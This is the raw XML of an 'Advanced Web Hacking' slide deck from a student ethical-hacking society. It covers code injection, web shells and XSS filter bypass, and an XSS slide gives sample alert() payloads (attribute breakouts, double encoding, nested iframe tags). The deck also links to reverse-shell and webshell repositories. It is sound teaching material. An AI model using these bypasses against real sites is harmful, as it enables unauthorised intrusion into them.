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embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId27"/>
      <p:bold r:id="rId28"/>
      <p:italic r:id="rId29"/>
      <p:boldItalic r:id="rId30"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono"/>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Roboto-bold.fntdata"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-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Mono-regular.fntdata"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-boldItalic.fntdata"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-italic.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-bold.fntdata"/><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font" Target="fonts/RobotoMono-bold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8c8c92569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8c8c92569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c82b12f5c3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c82b12f5c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c02d198cb2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c02d198cb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c608c6745b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c608c6745b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c02d198cb2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c02d198cb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c73ccd351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c73ccd351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c82b12f5c3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c82b12f5c3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Skip ahead a little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c576e06b8c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c576e06b8c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c608c6745b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c608c6745b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c608c6745b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c608c6745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c608c6745b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c608c6745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8df67c48a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8df67c48a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8c8c925694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8c8c925694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9bece4b735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9bece4b735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8df67c48a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8df67c48a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c82b12f5c3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c82b12f5c3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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code Injection Types</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS - modifying HTML page</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL - modifying queries</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Arbitrary code lets attacker do anything that the web server has permission to do</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Might be a way of getting single command RCE - like Laboratory</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Or it might be a web shel</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GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Goal is often web shell</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gives you interactivity on the server</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c02d198cb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c02d198cb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Shells - important step when gaining foothold/persistence on a box</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Errors - process wrong type of file - overly verbose errors can expose more about the system, cause path disclosures etc</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c02d198cb2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c02d198cb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We’ll demo this later</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c608c6745b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c608c6745b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Fix i.e. make unchangeable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c02d198cb2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c02d198cb2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c608c6745b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c608c6745b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0" y="0"/>
            <a:ext cx="9144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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="283412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3"/>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Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;16;p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Font typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;17;p3"/>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9" name="Shape 19"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Google Shape;20;p4"/>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5"/>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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298450" y="11510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6"/>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6"/>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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="35766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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490250" y="450150"/>
            <a:ext cx="6367800" cy="30960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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-26525" y="357647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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="0"/>
            <a:ext cx="4572000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3335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33354B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Google Shape;40;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4572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8"/>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8"/>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8"/>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4" name="Google Shape;44;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2834125"/>
            <a:ext cx="4572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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2000700" y="2559600"/>
            <a:ext cx="5143500" cy="243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400"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1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0"/>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0"/>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17500" lvl="0" marL="457200" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="14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33354B"/>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63250" y="95600"/>
            <a:ext cx="7417500" cy="5760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Clr>
                <a:srgbClr val="09CECE"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buNone/>
              <a:defRPr b="1" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>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7500" lvl="0" marL="4572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1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="9144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2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="13716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3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="18288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4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="22860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5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="27432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6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="32004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7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="36576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8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Google Shape;8;p1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7968174" y="4326475"/>
            <a:ext cx="1175825" cy="81702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book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#identify"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www.php.net/manual/en/language.oop5.magic.ph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0xdf.gitlab.io/2021/02/27/htb-academy.html#shell-manually" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.truesec.com/2020/02/12/from-s3-bucket-to-laravel-unserialize-rc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medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/XPATH_Injection" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=L_FYYJPVywM&amp;t=2650s" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gosecure.github.io/presentations/2017-12-04-confoo/Bypassing%20Modern%20XSS%20Protections.pdf" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/advanced-techniques-bypass-defeat-xss-filters-part-1-0190257/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=JcOR9krOPFY&amp;t=2820s" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection"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s://owasp.org/www-community/xss-filter-evasion-cheatsheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/Double_Encoding" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/contexts" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://resources.infosecinstitute.com/topic/anatomy-of-an-attack-gaining-reverse-shell-from-sql-injection/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/SQL_Injection" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Twigonometry/Deserialisation-Demo" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/blind" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Twigonometry/CTF-Tools/blob/master/scripts/jpegify.sh" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/support/xss-beating-html-sanitizing-filters" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/cheat-she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s://shefesh.com/assets/wiki/Give%20it%20a%20Go%20-%20An%20Introduction%20to%20Web%20Hacking%20-%20PDF.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://shefesh.com/assets/wiki/Juice%20Shop%20Session%20-%20PDF.pdf" TargetMode="External"/><Relationship Id="rId5"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null-byte.wonderhowto.com/how-to/bypass-file-upload-restrictions-web-apps-get-shell-0323454/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/List_of_file_signatur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github.com/pentestmonkey/php-reverse-shell" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/tennc/webshell" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/TheBinitGhimire/Web-Shell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youtube.com/watch?v=nBg6zUalb7c"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sz="4600"/>
              <a:t>Ethical Student Hackers</a:t>
            </a:r>
            <a:endParaRPr sz="4600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Google Shape;57;p1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Advanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> Web Hacking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Magic Demo!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="112" name="Google Shape;112;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1321075" y="831225"/>
            <a:ext cx="6501842" cy="4167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Advanced XSS</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="923875"/>
            <a:ext cx="8520600" cy="390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100"/>
              <a:t>A Quick Recap</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>XSS is a way of inserting malicious HTML code into a page</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>There are a few main types: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>XSS Defence Bypass</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Figure out what defences are being applied (if any). Are elements being deleted? Where is your code inserted?</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Match tags on HTML Element Content (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/p&gt;&lt;script&gt;alert(‘xss’)&lt;/script&gt;&lt;p&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Insert into HTML Element Attributes (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" autofocus onfocus=alert(document.domain) x="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Double encoding (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%253Cscript%253Ealert('XSS')%253C%252Fscript%253E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;&lt;script&gt;Foo&lt;/script&gt;iframe src="javascript:alert(‘xss’)"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>)</a:t>
            </a:r>
